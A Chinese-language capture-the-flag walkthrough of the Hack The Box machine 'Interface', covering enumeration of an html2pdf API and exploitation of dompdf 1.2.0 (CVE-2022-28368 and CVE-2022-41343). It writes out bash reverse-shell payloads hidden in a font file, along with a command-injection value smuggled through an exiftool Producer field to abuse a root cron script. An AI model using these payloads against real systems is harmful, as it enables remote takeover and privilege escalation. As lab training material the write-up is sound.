HTB-Machines-Interface
2023-5-21 12:3:57 Author: Matrix1024(查看原文) 阅读量:7 收藏

01

信息收集

1.1. 端口嗅探

使用Nmap对靶机地址进行端口扫描发现靶机开放22,80端口。

┌──(kali㉿kali)-[~/Desktop/Interface]└─$ sudo nmap -sT --min-rate 10000 -p- 10.129.228.208[sudo] password for kali:Starting Nmap 7.93 ( https://nmap.org ) at 2023-05-19 22:50 EDTWarning: 10.129.228.208 giving up on port because retransmission cap hit (10).Nmap scan report for 10.129.228.208Host is up (0.35s latency).Not shown: 56065 closed tcp ports (conn-refused), 9468 filtered tcp ports (no-response)PORT   STATE SERVICE22/tcp open  ssh80/tcp open  http
Nmap done: 1 IP address (1 host up) scanned in 102.01 seconds

继续使用-A -T4参数进行深度扫描22,80端口,获取到以下信息。

┌──(kali㉿kali)-[~/Desktop/Interface]└─$ sudo nmap -A -T4 10.129.228.208 -p 22,80  [sudo] password for kali:Starting Nmap 7.93 ( https://nmap.org ) at 2023-05-19 22:51 EDTWARNING: RST from 10.129.228.208 port 22 -- is this port really open?Stats: 0:00:34 elapsed; 0 hosts completed (1 up), 1 undergoing Script ScanNSE Timing: About 93.75% done; ETC: 22:51 (0:00:00 remaining)Nmap scan report for 10.129.228.208Host is up (0.35s latency).
PORT   STATE SERVICE VERSION22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.7 (Ubuntu Linux; protocol 2.0)| ssh-hostkey:|   2048 7289a0957eceaea8596b2d2dbc90b55a (RSA)|   256 01848c66d34ec4b1611f2d4d389c42c3 (ECDSA)|_  256 cc62905560a658629e6b80105c799b55 (ED25519)80/tcp open  http    nginx 1.14.0 (Ubuntu)|_http-server-header: nginx/1.14.0 (Ubuntu)|_http-title: Site MaintenanceWarning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed portAggressive OS guesses: Linux 5.0 (95%), Linux 4.15 - 5.6 (95%), Linux 3.1 (95%), Linux 3.2 (95%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (94%), Linux 5.0 - 5.3 (94%), Linux 5.3 - 5.4 (94%), Linux 2.6.32 (94%), ASUS RT-N56U WAP (Linux 3.4) (93%), Linux 3.16 (93%)No exact OS matches for host (test conditions non-ideal).Network Distance: 2 hopsService Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE (using port 80/tcp)HOP RTT       ADDRESS1   349.06 ms 10.10.14.12   349.23 ms 10.129.228.208
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .Nmap done: 1 IP address (1 host up) scanned in 34.87 seconds

1.2. Web服务

访问http://10.129.228.208/页面,网站返回We’ll be back soon!信息,未发现其他功能页面。通过Wappalyzer插件可以发现Web服务使用到了Next.js、React、Node.js、Webpack等组件。

获取到Web服务站点响应包内容如下。

HTTP/1.1 200 OKServer: nginx/1.14.0 (Ubuntu)Date: Sat, 20 May 2023 02:54:14 GMTContent-Type: text/html; charset=utf-8Connection: closeContent-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' 'self' data: https://www.google.com http://www.google-analytics.com/gtm/js https://*.gstatic.com/feedback/ https://ajax.googleapis.com; connect-src 'self' http://prd.m.rendering-api.interface.htb; style-src 'self' 'unsafe-inline' https://fonts.googleapis.com https://www.google.com; img-src https: data:; child-src data:;X-Powered-By: Next.jsETag: "i8ubiadkff4wf"Vary: Accept-EncodingContent-Length: 6359

在响应包中Content-Security-Policy字段中发现http://prd.m.rendering-api.interface.htb网址,同样在网站源代码中发现mailto:[email protected]

<ahref="mailto:[email protected]"  class="jsx-b59cd6f65990400b">

next.js属于React框架,经信息收集未发现next.js 13.0.4存在版本漏洞。

https://security.snyk.io/package/npm/next/versions?page=3

使用dirsearch工具对Web站点进行目录扫描,由于返回大量308状态码信息,使用-x 308参数进行过滤,未发现有价值的目录信息。

┌──(kali㉿kali)-[~/Desktop/Interface]└─$ dirsearch -u http://10.129.228.208/ -x 308  _|. _ _  _  _  _ _|_    v0.4.2 (_||| _) (/_(_|| (_| )Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 30 | Wordlist size: 10927Output File: /home/kali/.dirsearch/reports/10.129.228.208/-_23-05-19_23-12-12.txtError Log: /home/kali/.dirsearch/logs/errors-23-05-19_23-12-12.logTarget: http://10.129.228.208/
[23:12:14] Starting:[23:13:54] 200 -   15KB - /favicon.ico
Task Completed

1.3. prd.m.rendering-api.interface.htb

将prd.m.rendering-api.interface.htb和interface.htb添加至/etc/hosts文件中。

┌──(kali㉿kali)-[~/Desktop/Interface]└─$ cat /etc/hosts 127.0.0.1 localhost127.0.1.1 kali
# The following lines are desirable for IPv6 capable hosts::1     localhost ip6-localhost ip6-loopbackff02::1 ip6-allnodesff02::2 ip6-allrouters
# Interface10.129.228.208 prd.m.rendering-api.interface.htb10.128.228.208 interface.htb

访问http://prd.m.rendering-api.interface.htb/,页面返回File not found.信息。

HTTP/1.1 404 Not FoundServer: nginx/1.14.0 (Ubuntu)Date: Sat, 20 May 2023 03:36:31 GMTContent-Type: text/html; charset=UTF-8Connection: closeContent-Length: 16
File not found.

使用feroxbuster进行对http://prd.m.rendering-api.interface.htb/进行目录扫描,扫描器在Auto-filtering found 404-like response and created new filter自动过滤掉大量相同响应的404包后,返回http://prd.m.rendering-api.interface.htb/api的404包。

┌──(kali㉿kali)-[~/Desktop/Interface]└─$ feroxbuster -u http://prd.m.rendering-api.interface.htb/                                                              
___  ___  __   __     __      __         __   ___|__  |__  |__) |__) | /  `    /  \ \_/ | |  \ |__|    |___ |  \ |  \ | \__,    \__/ / \ | |__/ |___by Ben "epi" Risher 🤓                 ver: 2.9.1───────────────────────────┬────────────────────── 🎯  Target Url            │ http://prd.m.rendering-api.interface.htb/ 🚀  Threads               │ 50 📖  Wordlist              │ /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt 👌  Status Codes          │ All Status Codes! 💥  Timeout (secs)        │ 7 🦡  User-Agent            │ feroxbuster/2.9.1 💉  Config File           │ /etc/feroxbuster/ferox-config.toml 🏁  HTTP methods          │ [GET] 🔃  Recursion Depth       │ 4 🎉  New Version Available │ https://github.com/epi052/feroxbuster/releases/latest───────────────────────────┴────────────────────── 🏁  Press [ENTER] to use the Scan Management Menu™──────────────────────────────────────────────────404      GET        0l        0w        0c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter404      GET        1l        3w       16c http://prd.m.rendering-api.interface.htb/404      GET        1l        3w       50c http://prd.m.rendering-api.interface.htb/api403      GET        1l        2w       15c http://prd.m.rendering-api.interface.htb/vendor[####################] - 3m     30000/30000   0s      found:3       errors:0     [####################] - 3m     30000/30000   128/s   http://prd.m.rendering-api.interface.htb/

这里返回了/api和/vendor两个目录,我们可以对这两个目录进行逐一分析。

1.3.1. /api

使用curl工具查看http://prd.m.rendering-api.interface.htb/api响应,返回"route not defined"信息,断定该地址为API接口地址。

┌──(kali㉿kali)-[~/Desktop/Interface]└─$ curl -v http://prd.m.rendering-api.interface.htb/api  *   Trying 10.129.228.208:80...* Connected to prd.m.rendering-api.interface.htb (10.129.228.208) port 80 (#0)> GET /api HTTP/1.1> Host: prd.m.rendering-api.interface.htb> User-Agent: curl/7.88.1> Accept: */*>< HTTP/1.1 404 Not Found< Server: nginx/1.14.0 (Ubuntu)< Date: Sat, 20 May 2023 04:05:25 GMT< Content-Type: application/json< Transfer-Encoding: chunked< Connection: keep-alive<* Connection #0 to host prd.m.rendering-api.interface.htb left intact{"status":"404","status_text":"route not defined"}

使用feroxbuster对api进行目录扫描,指定字典为seclists字典集中的raft-large-words.txt,使用-m GET,POST指定通过GET和POST两种模式进行扫描,因为常见API接口经常会用到GET和POST两种方式。在扫描结果中发现了/html2pdf目录。

└─$ feroxbuster -u http://prd.m.rendering-api.interface.htb/api/ -w /usr/share/seclists/Discovery/Web-Content/raft-large-words.txt -m GET,POST
___  ___  __   __     __      __         __   ___|__  |__  |__) |__) | /  `    /  \ \_/ | |  \ |__|    |___ |  \ |  \ | \__,    \__/ / \ | |__/ |___by Ben "epi" Risher 🤓                 ver: 2.9.1───────────────────────────┬────────────────────── 🎯  Target Url            │ http://prd.m.rendering-api.interface.htb/api/ 🚀  Threads               │ 50 📖  Wordlist              │ /usr/share/seclists/Discovery/Web-Content/raft-large-words.txt 👌  Status Codes          │ All Status Codes! 💥  Timeout (secs)        │ 7 🦡  User-Agent            │ feroxbuster/2.9.1 💉  Config File           │ /etc/feroxbuster/ferox-config.toml 🏁  HTTP methods          │ [GET, POST] 🔃  Recursion Depth       │ 4 🎉  New Version Available │ https://github.com/epi052/feroxbuster/releases/latest───────────────────────────┴────────────────────── 🏁  Press [ENTER] to use the Scan Management Menu™──────────────────────────────────────────────────404      GET        1l        3w       50c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter404     POST        1l        3w       50c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter422     POST        1l        2w       36c http://prd.m.rendering-api.interface.htb/api/html2pdf[####################] - 35m   239202/239202  0s      found:1       errors:46    [####################] - 35m   239202/239202  112/s   http://prd.m.rendering-api.interface.htb/api/

使用curl工具通过POST方式请求/api/html2pdf,页面返回{"status_text":"missing parameters"},即在使用POST请求时存在参数缺失。

┌──(kali㉿kali)-[~/Desktop/Interface]└─$ curl -X POST http://prd.m.rendering-api.interface.htb/api/html2pdf{"status_text":"missing parameters"}

这时可以通过构造缺失的参数体进行请求,这也是API攻击典型的方式。从上面可以看到返回的信息为JSON格式,所以我们可以尝试构造JSON格式的参数'{"abc":"abc"}'。观察/api/html2pdf,根据习惯可以猜测html2pdf为API功能,且此功能为HTML向PDF转换。所以最终构造成的参数为{"html":"abc"}。使用curl -X -d命令进行请求,因为返回的二进制数据,可以使用--output -来获取返回信息。

┌──(kali㉿kali)-[~/Desktop/Interface]└─$ curl -v -X POST http://prd.m.rendering-api.interface.htb/api/html2pdf -d '{"html":"
abc
"}' --output -Note: Unnecessary use of -X or --request, POST is already inferred.*   Trying 10.129.228.208:80...* Connected to prd.m.rendering-api.interface.htb (10.129.228.208) port 80 (#0)> POST /api/html2pdf HTTP/1.1> Host: prd.m.rendering-api.interface.htb> User-Agent: curl/7.88.1> Accept: */*> Content-Length: 34> Content-Type: application/x-www-form-urlencoded>< HTTP/1.1 200 OK< Server: nginx/1.14.0 (Ubuntu)< Date: Sat, 20 May 2023 06:21:07 GMT< Content-Type: application/pdf< Content-Length: 1130< Connection: keep-alive< X-Local-Cache: hit< Cache-Control: public< Content-Transfer-Encoding: Binary< Content-Disposition: attachment; filename=export.pdf<%PDF-1.71 0 obj<< /Type /Catalog/Outlines 2 0 R/Pages 3 0 R >>endobj2 0 obj<< /Type /Outlines /Count 0 >>endobj3 0 obj<< /Type /Pages/Kids [6 0 R]/Count 1/Resources <</ProcSet 4 0 R/Font <</F1 8 0 R>>>>/MediaBox [0.000 0.000 419.530 595.280] >>endobj4 0 obj[/PDF /Text ]endobj5 0 obj<</Producer (��dompdf 1.2.0 + CPDF)/CreationDate (D:20230520062044+00'00')/ModDate (D:20230520062044+00'00')>>endobj6 0 obj<< /Type /Page/MediaBox [0.000 0.000 419.530 595.280]/Parent 3 0 R/Contents 7 0 R>>endobj7 0 obj<< /Filter /FlateDecode/Length 66 >>streamx��2�[email protected]&�ҹ�B�M�
                 �L���,L-BR��
                             ��                                B��5��5cB�\C݆�endstreamendobj8 0 obj<< /Type /Font/Subtype /Type1/Name /F1/BaseFont /Times-Roman/Encoding /WinAnsiEncoding>>endobjxref0 90000000000 65535 f0000000009 00000 n0000000074 00000 n0000000120 00000 n0000000274 00000 n0000000303 00000 n0000000452 00000 n0000000555 00000 n0000000692 00000 ntrailer<</Size 9/Root 1 0 R/Info 5 0 R/ID[]>>startxref801%%EOF* Connection #0 to host prd.m.rendering-api.interface.htb left intact

发送构造的请求,成果返回了数据。在响应包中发现我们输入的HTML被转换成了PDF格式Content-Disposition: attachment; filename=export.pdf,生成PDF用到了dompdf 1.2.0组件。

1.3.2. /vendor

使用curl工具查看http://prd.m.rendering-api.interface.htb/vendor响应,返回403 Forbidden信息。

┌──(kali㉿kali)-[~/Desktop/Interface]└─$ curl -v http://prd.m.rendering-api.interface.htb/vendor*   Trying 10.129.228.208:80...* Connected to prd.m.rendering-api.interface.htb (10.129.228.208) port 80 (#0)> GET /vendor HTTP/1.1> Host: prd.m.rendering-api.interface.htb> User-Agent: curl/7.88.1> Accept: */*>< HTTP/1.1 403 Forbidden< Server: nginx/1.14.0 (Ubuntu)< Date: Sat, 20 May 2023 04:04:48 GMT< Content-Type: text/html; charset=UTF-8< Transfer-Encoding: chunked< Connection: keep-alive<Access denied.* Connection #0 to host prd.m.rendering-api.interface.htb left intact

使用feroxbuster对vendor目录进行目录扫描,这里使用seclists字典集中的raft-large-words.txt。扫描结束后发现dompdf和composer目录,状态码为403。

┌──(kali㉿kali)-[~/Desktop/Interface]└─$ feroxbuster -u http://prd.m.rendering-api.interface.htb/vendor/ -w /usr/share/seclists/Discovery/Web-Content/raft-large-words.txt
___  ___  __   __     __      __         __   ___|__  |__  |__) |__) | /  `    /  \ \_/ | |  \ |__|    |___ |  \ |  \ | \__,    \__/ / \ | |__/ |___by Ben "epi" Risher 🤓                 ver: 2.9.1───────────────────────────┬────────────────────── 🎯  Target Url            │ http://prd.m.rendering-api.interface.htb/vendor/ 🚀  Threads               │ 50 📖  Wordlist              │ /usr/share/seclists/Discovery/Web-Content/raft-large-words.txt 👌  Status Codes          │ All Status Codes! 💥  Timeout (secs)        │ 7 🦡  User-Agent            │ feroxbuster/2.9.1 💉  Config File           │ /etc/feroxbuster/ferox-config.toml 🏁  HTTP methods          │ [GET] 🔃  Recursion Depth       │ 4 🎉  New Version Available │ https://github.com/epi052/feroxbuster/releases/latest───────────────────────────┴────────────────────── 🏁  Press [ENTER] to use the Scan Management Menu™──────────────────────────────────────────────────404      GET        0l        0w        0c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter404      GET        1l        3w       16c http://prd.m.rendering-api.interface.htb/vendor/403      GET        1l        2w       15c http://prd.m.rendering-api.interface.htb/vendor/dompdf403      GET        1l        2w       15c http://prd.m.rendering-api.interface.htb/vendor/composer[####################] - 16m   119601/119601  0s      found:3       errors:201   [####################] - 16m   119601/119601  119/s   http://prd.m.rendering-api.interface.htb/vendor/

使用feroxbuster对vendor/dompdf/目录进行目录扫描,这里使用seclists字典集中的raft-large-words.txt。扫描结束后发现/vendor/dompdf/dompdf目录,状态码为403。

┌──(kali㉿kali)-[~/Desktop/Interface]└─$ feroxbuster -u http://prd.m.rendering-api.interface.htb/vendor/dompdf/ -w /usr/share/seclists/Discovery/Web-Content/raft-large-words.txt
___  ___  __   __     __      __         __   ___|__  |__  |__) |__) | /  `    /  \ \_/ | |  \ |__|    |___ |  \ |  \ | \__,    \__/ / \ | |__/ |___by Ben "epi" Risher 🤓                 ver: 2.9.1───────────────────────────┬────────────────────── 🎯  Target Url            │ http://prd.m.rendering-api.interface.htb/vendor/dompdf/ 🚀  Threads               │ 50 📖  Wordlist              │ /usr/share/seclists/Discovery/Web-Content/raft-large-words.txt 👌  Status Codes          │ All Status Codes! 💥  Timeout (secs)        │ 7 🦡  User-Agent            │ feroxbuster/2.9.1 💉  Config File           │ /etc/feroxbuster/ferox-config.toml 🏁  HTTP methods          │ [GET] 🔃  Recursion Depth       │ 4 🎉  New Version Available │ https://github.com/epi052/feroxbuster/releases/latest───────────────────────────┴────────────────────── 🏁  Press [ENTER] to use the Scan Management Menu™──────────────────────────────────────────────────404      GET        0l        0w        0c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter404      GET        1l        3w       16c http://prd.m.rendering-api.interface.htb/vendor/dompdf/403      GET        1l        2w       15c http://prd.m.rendering-api.interface.htb/vendor/dompdf/dompdf[####################] - 18m   119601/119601  0s      found:2       errors:153   [####################] - 18m   119601/119601  109/s   http://prd.m.rendering-api.interface.htb/vendor/dompdf/

继续使用feroxbuster对/vendor/dompdf/dompdf/目录进行目录扫描,发现以下信息。

┌──(kali㉿kali)-[~/Desktop/Interface]└─$ feroxbuster -u http://prd.m.rendering-api.interface.htb/vendor/dompdf/dompdf/ -w /usr/share/seclists/Discovery/Web-Content/raft-large-words.txt
___  ___  __   __     __      __         __   ___|__  |__  |__) |__) | /  `    /  \ \_/ | |  \ |__|    |___ |  \ |  \ | \__,    \__/ / \ | |__/ |___by Ben "epi" Risher 🤓                 ver: 2.9.1───────────────────────────┬────────────────────── 🎯  Target Url            │ http://prd.m.rendering-api.interface.htb/vendor/dompdf/dompdf/ 🚀  Threads               │ 50 📖  Wordlist              │ /usr/share/seclists/Discovery/Web-Content/raft-large-words.txt 👌  Status Codes          │ All Status Codes! 💥  Timeout (secs)        │ 7 🦡  User-Agent            │ feroxbuster/2.9.1 💉  Config File           │ /etc/feroxbuster/ferox-config.toml 🏁  HTTP methods          │ [GET] 🔃  Recursion Depth       │ 4 🎉  New Version Available │ https://github.com/epi052/feroxbuster/releases/latest───────────────────────────┴────────────────────── 🏁  Press [ENTER] to use the Scan Management Menu™──────────────────────────────────────────────────404      GET        0l        0w        0c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter404      GET        1l        3w       16c http://prd.m.rendering-api.interface.htb/vendor/dompdf/dompdf/403      GET        1l        2w       15c http://prd.m.rendering-api.interface.htb/vendor/dompdf/dompdf/lib403      GET        1l        2w       15c http://prd.m.rendering-api.interface.htb/vendor/dompdf/dompdf/tests403      GET        1l        2w       15c http://prd.m.rendering-api.interface.htb/vendor/dompdf/dompdf/src403      GET        1l        2w       15c http://prd.m.rendering-api.interface.htb/vendor/dompdf/dompdf/VERSION403      GET        1l        2w       15c http://prd.m.rendering-api.interface.htb/vendor/dompdf/dompdf/.git403      GET        1l        2w       15c http://prd.m.rendering-api.interface.htb/vendor/dompdf/dompdf/.gitignore[####################] - 16m   119601/119601  0s      found:7       errors:1     [####################] - 16m   119601/119601  117/s   http://prd.m.rendering-api.interface.htb/vendor/dompdf/dompdf/

1.4. 子域名枚举

使用wfuzz进行子域名枚举,未发现存在其他子域名信息。

┌──(kali㉿kali)-[~/Desktop/Interface]└─$ wfuzz -c -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt --hl 1 -H "Host: FUZZ.interface.htb" http://10.129.228.208/ /usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.********************************************************* Wfuzz 3.1.0 - The Web Fuzzer                         *********************************************************
Target: http://10.129.228.208/Total requests: 4989
=====================================================================ID           Response   Lines    Word       Chars       Payload                                                     =====================================================================

Total time: 0Processed Requests: 4989Filtered Requests: 4989Requests/sec.: 0

02

获取www-data权限

在/api/html2pdf接口在对HTML到PDF转换时,用到了dompdf 1.2.0的组件。经过信息收集,发现该组件存在远程命令执行的漏洞CVE-2022-28368和CVE-2022-41343。

2.1. CVE-2022-28368

通过信息收集,找到以下文章帮助我们进行漏洞利用。

# 漏洞利用原理https://positive.security/blog/dompdf-rcehttps://exploit-notes.hdks.org/exploit/web/dompdf-rce/# 漏洞利用工具https://github.com/positive-security/dompdf-rce

将dompdf-rce漏洞利用工具下载至本地。查看exploit.css内容如下,指向exploit_font.php为漏洞利用脚本。

┌──(kali㉿kali)-[~/Desktop/Interface/dompdf-rce-main/exploit]└─$ cat exploit.css@font-face {    font-family:'exploitfont';    src:url('http://10.10.14.2:9001/exploit_font.php');    font-weight:'normal';    font-style:'normal';  }

在exploit_font.php末尾插入PHP反弹shell的脚本。& /dev/tcp/10.10.14.2/4444 0>&1'"); ?>

┌──(kali㉿kali)-[~/Desktop/Interface/dompdf-rce-main/exploit]└─$ cat exploit_font.php
� dum1�cmap           `�,glyf5sc��head�Q6�6hhea��($hmtxDlocaTmaxp\ nameD�|8dum2�                     -��-����:83#5:08��_<�             @�8�&۽:8L��
:D
6    s<?php system("bash -c 'bash -i >& /dev/tcp/10.10.14.2/4444 0>&1'"); ?>

使用python3开启Web服务,服务端口为9001。

┌──(kali㉿kali)-[~/Desktop/Interface/dompdf-rce-main/exploit]└─$ python3 -m http.server 9001Serving HTTP on 0.0.0.0 port 9001 (http://0.0.0.0:9001/) ...

在Burpsuite中Repeater模块中,将html参数值设为,触发漏洞执行。

POST /api/html2pdf HTTP/1.1
Host: prd.m.rendering-api.interface.htbUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: closeUpgrade-Insecure-Requests: 1Content-Type: application/jsonContent-Length: 74
{"html":"<link rel=stylesheet href='http://10.10.14.2:9001/exploit.css'>"

此时存有反弹shell的exploit_font.php就被上传至了/dompdf/lib/fonts/__.php,因为和在中已声明,所以我们只要计算出http://10.10.14.2:9001/exploit_font.php的MD5,即可找到文件上传路径。

┌──(kali㉿kali)-[~/Desktop/Interface/dompdf-rce-main/exploit]└─$ echo -n 'http://10.10.14.2:9001/exploit_font.php' | md5sumd71339beac9da6cde233001997c94731  -

使用nc监听4444端口,并使用curl工具触发PHP反弹shell。

┌──(kali㉿kali)-[~/Desktop/Interface/dompdf-rce-main/exploit]└─$ curl -v http://prd.m.rendering-api.interface.htb/vendor/dompdf/dompdf/lib/fonts/exploitfont_normal_d71339beac9da6cde233001997c94731.php --output -*   Trying 10.129.72.208:80...* Connected to prd.m.rendering-api.interface.htb (10.129.72.208) port 80 (#0)> GET /vendor/dompdf/dompdf/lib/fonts/exploitfont_normal_d71339beac9da6cde233001997c94731.php HTTP/1.1> Host: prd.m.rendering-api.interface.htb> User-Agent: curl/7.88.1> Accept: */*>

此时在nc已经接收到了shell,获取到了靶机的www-data权限。

┌──(kali㉿kali)-[~]└─$ nc -lvp 4444                         listening on [any] 4444 ...connect to [10.10.14.2] from prd.m.rendering-api.interface.htb [10.129.72.208] 34890bash: cannot set terminal process group (1390): Inappropriate ioctl for devicebash: no job control in this shell[email protected]:~/api/vendor/dompdf/dompdf/lib/fonts$ ididuid=33(www-data) gid=33(www-data) groups=33(www-data)[email protected]:~/api/vendor/dompdf/dompdf/lib/fonts$

2.2. CVE-2022-41343

使用cve-2022-41343漏洞利用工具同样可以获取shell,利用方式同2.1 CVE-2022-28368,但是该工具会更加的自动化。https://github.com/BKreisel/CVE-2022-41343

┌──(kali㉿kali)-[~/.local/bin]└─$ ./cve-2022-41343 10.10.14.2 4445

░█████╗░██╗░░░██╗███████╗░░░░░░██████╗░░█████╗░██████╗░██████╗░░░░░░░░░██╗██╗░░███╗░░██████╗░░░██╗██╗██████╗░██╔══██╗██║░░░██║██╔════╝░░░░░░╚════██╗██╔══██╗╚════██╗╚════██╗░░░░░░░██╔╝██║░████║░░╚════██╗░██╔╝██║╚════██╗██║░░╚═╝╚██╗░██╔╝█████╗░░█████╗░░███╔═╝██║░░██║░░███╔═╝░░███╔═╝█████╗██╔╝░██║██╔██║░░░█████╔╝██╔╝░██║░█████╔╝██║░░██╗░╚████╔╝░██╔══╝░░╚════╝██╔══╝░░██║░░██║██╔══╝░░██╔══╝░░╚════╝███████║╚═╝██║░░░╚═══██╗███████║░╚═══██╗╚█████╔╝░░╚██╔╝░░███████╗░░░░░░███████╗╚█████╔╝███████╗███████╗░░░░░░╚════██║███████╗██████╔╝╚════██║██████╔╝░╚════╝░░░░╚═╝░░░╚══════╝░░░░░░╚══════╝░╚════╝░╚══════╝╚══════╝░░░░░░░░░░░╚═╝╚══════╝╚═════╝░░░░░░╚═╝╚═════╝░PoC for CVE-2022-41343 - dompdf Version < 2.0.1
[*] CSS Payload...        @font-face {            font-family:'comicsploitz';            src:url('http://10.10.14.2:55555/comicsploitz.php');            font-weight:'normal';            font-style:'normal';        }
[*] TTF Payload :+  /dev/tcp/10.10.14.2/4445 0<&5 1>&5 2>&5'")?>[*] CSS Link    :[*] Listener    : nc -nvlp 4445[*] Web Path    : dompdf/dompdf/lib/fonts/comicsploitz_normal_a90483d8757c5671db94a1660e630450.php
[*] Server Started on 55555 (Ctrl+C to stop)
[+] Got Stage 1 Request. Sent CSS Payload 📎[+] Got Stage 2 Request. Sent TTF Payload 🏴☠️

在/home/dev目录下找到user.txt。

[email protected]:~/api/vendor/dompdf/dompdf/lib/fonts$ cd /home[email protected]:/home$ lsdev[email protected]:/home$ cd dev[email protected]:/home/dev$ lsuser.txt[email protected]:/home/dev$ cat user.txtae8491d99db6335782a2323136cd4e6e[email protected]:/home/dev$

03

获取root权限

使用sudo -l查看www-data可以使用root权限执行的文件,提示需要输入密码,无法通过sudo -l进行提权。

www-da[email protected]:/home/dev$ sudo -l[sudo] password for www-data:Sorry, try again.

使用pspy64分析进程,发现~/api/vendor/dompdf/dompdf/lib目录下可写,将pspy64上传至靶机并给予执行权限。

[email protected]:~/api/vendor/dompdf/dompdf/lib$ ls -latotal 236drwxr-xr-x 5 www-data www-data   4096 Nov 20 21:59 .drwxr-xr-x 6 www-data www-data   4096 Jan 16 09:49 ..-rw-r--r-- 1 www-data www-data 221151 Nov 20 21:59 Cpdf.phpdrwxr-xr-x 2 www-data www-data   4096 May 20 09:25 fontsdrwxr-xr-x 2 www-data www-data   4096 Nov 20 21:59 html5libdrwxr-xr-x 2 www-data www-data   4096 Nov 20 21:59 res<ndor/dompdf/dompdf/lib$ wget http://10.10.14.2:9001/pspy64                 --2023-05-20 09:28:58--  http://10.10.14.2:9001/pspy64Connecting to 10.10.14.2:9001... connected.HTTP request sent, awaiting response... 200 OKLength: 3104768 (3.0M) [application/octet-stream]Saving to: 'pspy64'
pspy64              100%[===================>]   2.96M   956KB/s    in 3.2s    
2023-05-20 09:29:02 (956 KB/s) - 'pspy64' saved [3104768/3104768][email protected]:~/api/vendor/dompdf/dompdf/lib$ ls -latotal 3268drwxr-xr-x 5 www-data www-data    4096 May 20 09:28 .drwxr-xr-x 6 www-data www-data    4096 Jan 16 09:49 ..-rw-r--r-- 1 www-data www-data  221151 Nov 20 21:59 Cpdf.phpdrwxr-xr-x 2 www-data www-data    4096 May 20 09:25 fontsdrwxr-xr-x 2 www-data www-data    4096 Nov 20 21:59 html5lib-rw-r--r-- 1 www-data www-data 3104768 May 20 09:24 pspy64drwxr-xr-x 2 www-data www-data    4096 Nov 20 21:59 res[email protected]:~/api/vendor/dompdf/dompdf/lib$ chmod +x pspy64

运行pspy64。

[email protected]:~/api/vendor/dompdf/dompdf/lib$ ./pspy64pspy - version: v1.2.1 - Commit SHA: f9e6a1590a4312b9faa093d8dc84e19567977a6d

    ██▓███    ██████  ██▓███ ▓██   ██▓    ▓██░  ██▒▒██    ▒ ▓██░  ██▒▒██  ██▒    ▓██░ ██▓▒░ ▓██▄   ▓██░ ██▓▒ ▒██ ██░    ▒██▄█▓▒ ▒  ▒   ██▒▒██▄█▓▒ ▒ ░ ▐██▓░    ▒██▒ ░  ░▒██████▒▒▒██▒ ░  ░ ░ ██▒▓░    ▒▓▒░ ░  ░▒ ▒▓▒ ▒ ░▒▓▒░ ░  ░  ██▒▒▒    ░▒ ░     ░ ░▒  ░ ░░▒ ░     ▓██ ░▒░    ░░       ░  ░  ░  ░░       ▒ ▒ ░░                   ░           ░ ░                                   ░ ░    
Config: Printing events (colored=true): processes=true | file-system-events=false ||| Scanning for processes every 100ms and on inotify events ||| Watching directories: [/usr /tmp /etc /home /var /opt] (recursive) | [] (non-recursive)Draining file system events due to startup...done...2023/05/20 09:34:01 CMD: UID=0     PID=3225   | /usr/sbin/CRON -f2023/05/20 09:34:01 CMD: UID=0     PID=3224   | /usr/sbin/CRON -f2023/05/20 09:34:01 CMD: UID=0     PID=3226   | /bin/bash /usr/local/sbin/cleancache.sh...2023/05/20 09:39:01 CMD: UID=0     PID=3372   | /bin/bash /usr/local/sbin/cleancache.sh2023/05/20 09:39:01 CMD: UID=0     PID=3371   | /bin/sh -c /usr/local/sbin/cleancache.sh2023/05/20 09:39:01 CMD: UID=0     PID=3370   | /usr/sbin/CRON -f

可以看到cleancache.sh脚本是在使用exiftool工具检查/tmp/目录下文件的Producer是否为dompdf,如果不是则删除文件。

[email protected]:~/api/vendor/dompdf/dompdf/lib$ cat /usr/local/sbin/cleancache.sh#! /bin/bashcache_directory="/tmp"for cfile in "$cache_directory"/*; do
   if [[ -f "$cfile" ]]; then
       meta_producer=$(/usr/bin/exiftool -s -s -s -Producer "$cfile" 2>/dev/null | cut -d " " -f1)
       if [[ "$meta_producer" -eq "dompdf" ]]; then            echo "Removing $cfile"            rm "$cfile"        fi
   fi
done

这里用到了if [[ "$meta_producer" -eq "dompdf" ]]语句,可以通过控制$meta_producer参数的输入达到命令执行的目的。https://www.vidarholen.net/contents/blog/?p=716

通过创建test文件,使用exiftool更改文件的创建者,在里面插入whoami命令,手动执行cleancache.sh执行,发现命令成功执行返回www-data。

[email protected]:/tmp$ touch test[email protected]:/tmp$ exiftool -Producer='a[$(whoami>&2)]' test    1 image files updated[email protected]:/tmp$ /usr/local/sbin/cleancache.sh              www-dataSat May 20 10:23:34 UTC 2023[email protected]:/tmp$

可以将可控的参数改为反弹shell,通过定时任务root权限执行获得root权限的shell。在可写目录~/api/vendor/dompdf/dompdf/lib文件夹下创建反弹shell文件reverse_shell.sh,并增加执行权限。

[email protected]:~/api/vendor/dompdf/dompdf/lib$ cat reverse_shell.sh#!/bin/bashbash -c 'bash -i >& /dev/tcp/10.10.14.2/6666 0>&1'[email protected]:~/api/vendor/dompdf/dompdf/lib$ chmod +x reverse_shell.sh

